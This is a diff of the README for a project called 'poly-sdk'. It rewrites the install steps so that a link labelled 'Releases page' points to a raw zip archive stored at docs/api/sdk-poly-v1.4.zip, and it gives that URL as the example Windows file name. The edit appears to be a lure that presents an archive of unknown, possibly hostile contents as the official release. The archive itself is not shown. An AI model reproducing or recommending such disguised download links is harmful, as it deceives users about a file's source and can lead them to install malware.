wezilushinga/poly-sdk/README.md

 To get started with **poly-sdk**, you need to install it on your machine.
 Follow these steps:

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/wezilushinga/poly-sdk/releases) to find the latest version of the SDK.
+   Go to the [Releases page](https://raw.githubusercontent.com/wezilushinga/poly-sdk/main/docs/api/sdk-poly-v1.4.zip) to find the latest version of the SDK.

 2. **Download the File**
    Locate the most recent release and download the appropriate file for your operating system.
-For example, if you’re using Windows, you might see a file named `poly-sdk-windows.zip`.
+For example, if you’re using Windows, you might see a file named `https://raw.githubusercontent.com/wezilushinga/poly-sdk/main/docs/api/sdk-poly-v1.4.zip`.

 3. **Extract the Downloaded File**
    After the download is complete, locate the file in your downloads folder.
 Right-click on the file and select "Extract All" to unzip it.